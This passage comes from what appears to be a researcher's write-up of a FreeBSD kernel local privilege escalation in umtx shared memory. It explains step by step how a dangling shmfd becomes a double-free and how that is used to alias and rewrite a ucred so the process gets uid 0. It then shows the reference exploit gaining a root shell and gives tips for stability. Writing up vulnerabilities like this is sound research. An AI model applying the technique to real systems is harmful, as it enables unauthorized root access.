shmfd pointer.
Next we perform a UMTX_SHM_LOOKUP operation. Here’s the
relevant part of umtx_shm again:
static int
umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
...
[2] reg = umtx_shm_find_reg(&key);
...
error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
[3] shm_hold(reg->ushm_obj);
finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
umtx_shm_unref_reg(reg, false);
return (error);
}
At [2], the kernel will find the umtx_shm_reg with the
dangling shmfd and prepare a file descriptor for us. In
setting up this file descriptor, it will call shm_hold on
the freed data [3], bumping the refcount back from 0 to 1 again.
Finally, if we close the resulting file descriptor right
away, we will reach shm_drop again, but this time with all
of the legitimate kernel pointers still in place (since the freed memory
wasn’t zeroed).
We have now performed a double-free.
With this done, now is a good time to remove the
umtx_shm_reg entry since it still holds a dangling pointer
to this double-freed memory. It’s safe to perform a
UMTX_SHM_DESTROY at this point since the shmfd
refcount has returned to zero: in cleaning up the
umtx_shm_reg, the refcount will drop again, but to -1 this
time – which is safe.
Now we are in a stable situation with a double-freed
malloc256 element since the size of a shmfd is
208 bytes.
What this means is that the next 2 allocations from the
malloc256 bucket will return the same virtual address. By
choosing which two allocations come from there next, we can choose two
objects to overlap in a useful way.
Aliasing a cap_ioctls_limit Array with
ucred
The cap_ioctls_limit syscall will be very useful here.
The purpose of the syscall is to allow userland to specify an allowlist
of permissible ioctl codes for an open file descriptor:
int
sys_cap_ioctls_limit(struct thread *td, struct cap_ioctls_limit_args *uap)
{
u_long *cmds;
size_t ncmds;
int error;
ncmds = uap->ncmds;
if (ncmds > IOCTLS_MAX_COUNT)
return (EINVAL);
if (ncmds == 0) {
cmds = NULL;
} else {
[1] cmds = malloc(sizeof(cmds[0]) * ncmds, M_FILECAPS, M_WAITOK);
[2] error = copyin(uap->cmds, cmds, sizeof(cmds[0]) * ncmds);
if (error != 0) {
free(cmds, M_FILECAPS);
return (error);
}
}
[3] return (kern_cap_ioctls_limit(td, uap->fd, cmds, ncmds));
}
We can see the way this works is to malloc a
user-controlled size [1], fill it with user-controlled content [2] and
attach it to a file descriptor [3].
By calling cap_ioctls_limit with a zero length buffer,
we cause the kernel to free any previously-attached
ioctl limit buffer.
With an ioctl limit buffer in place, we can even read
the contents of it back with the cap_ioctls_get
syscall.
This provides us with:
- The ability to allocate from a range of
mallocbuckets. - The ability to fill that allocation with arbitrary data.
- The ability to read the contents of the buffer back.
- The ability to free that buffer whenever we want to.
This is an extremely powerful mechanism for controlling use-after-frees.
Armed with this knowledge, we will use an ioctl limit
buffer as one of our allocations out of the double-freed address.
Whichever other object we choose as the other allocation for the
double-freed address, we will now be able to read the content through
cap_ioctls_get and even free/replace it with calls to
cap_ioctls_limit.
Looking at the size of a ucred credential structure,
this seems like a perfect candidate to alias since they will be
allocated from the same bucket as shmfd came from (and
hence where our double-free is set up):
(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256
With our double freed element in place, the plan is then:
- Allocate once with
cap_ioctls_limit. - Allocate again with a
ucredby callingsetuid(getuid())(this is allowed regardless of privilege and results in a newucredallocation). - Read the
ucredstructure throughcap_ioctls_get. - Fix up the
cr_uidto be 0 and also increase thecr_refrefcount. - Free the
ioctlbuffer withcap_ioctls_limit(NULL). - Allocate that buffer back again with
cap_ioctls_limit(&cred).
The net effect of this is that we’ve changed our process’ credential:
cr_uidis now 0, so we’ve become root.cr_refhas increased – which will be explained now.
Stopping here isn’t enough because we’re in a dangerous position:
closing the file descriptor associated with the ioctl limit
buffer will free our process’ credential, ultimately leading to a panic.
We need to transition to a stable state.
Since we’re now root according to the kernel, we’re free to allocate
ourselves a better credential: we can call
setresuid(0, 0, 0);.
In doing this, the kernel will allocate a new ucred and
drop the refcount on our previous one. Since we increased the
cr_ref as part of our fix-up, this will prevent that
ucred from being freed. Our process will now transition to
the new full-root credential and away from the double-freed memory
slot.
Finally, because the cr_ref didn’t reach zero, our file
descriptor’s ioctl limit buffer holds the only reference to
the double-freed slot – it’s no longer double-freed and so we’ve
restored stability.
We can now call setresgid(0, 0, 0); to fully transition
to a pure root credential, feel free to close the ioctl
limit file descriptor and simply drop to a root shell.
Reference Implementation
My reference implementation of the exploit discussed here works in the way described at the end of the previous section:
- We leverage the vulnerability to acquire a file descriptor with a
dangling
shmfdpointer. - We create/destroy another SHM through
UMTX_OP_SHMto create a double-free. - We leverage the double-free to alias a
cap_ioctls_limitbuffer with aucredstruct. - We use
cap_ioctls_getandcap_ioctls_limitagain to read/write theucredin place. - We transition to a full root credential and close any resources.
- Finally, we drop to
/bin/sh -ias root.
Sample output running against a 13.2-RELEASE kernel that I happen to have:
user@freebsd:~/umtx $ uname -a
FreeBSD freebsd 13.2-RELEASE FreeBSD 13.2-RELEASE releng/13.2-n254617-525ecfdad597 GENERIC amd64
user@freebsd:~/umtx $ make && ./umtx
cc -Isrc -c src/kalloc.c -o src/kalloc.o
cc -Isrc -c src/main.c -o src/main.o
cc -Isrc -c src/uaf.c -o src/uaf.o
cc -Isrc -c src/util.c -o src/util.o
cc -Isrc -pthread -o umtx src/kalloc.o src/main.o src/uaf.o src/util.o
[+] racing to create dangling shmfd...
[+] success!
[+] creating umtx_shm_reg with dangling shmfd
[+] doing double-free
[+] allocating placeholder into double slot
[+] allocating cred into double slot
[+] read cred with uid=1001:
0c 4e 1d 81 ff ff ff ff 00 00 03 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
02 00 00 00 02 00 00 00 ff ff ff ff 00 00 00 00
00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 e9 03 00 00 e9 03 00 00
e9 03 00 00 02 00 00 00 e9 03 00 00 e9 03 00 00
00 38 31 4c 00 f8 ff ff 00 38 31 4c 00 f8 ff ff
50 70 90 81 ff ff ff ff c0 28 07 03 00 f8 ff ff
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bc 10 17 68 00 f8 ff ff 10 00 00 00 e9 03 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[+] fixing up and replacing
[+] attempting to secure creds
[+] uid=0, gid=0
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
#
Stability
Empirical testing shows that the probability of failing and triggering a kernel panic largely depends on how busy the kernel heap is while triggering the race condition. This is to be expected, since assumptions are made about which objects will be dispensed from the heap at critical points.
The reference implementation of the exploit was adjusted to improve stability in this way: a first cut constantly created and reaped new threads (for Thread A, Thread B and Thread C) in a loop, but this resulted in fairly common panics.
Adjusting the exploit to use primitive synchronisation between the threads – thereby avoiding auxiliary use of the heap – has proven to stabilise exploitation.
I have not yet observed any panics as a result of this refactoring.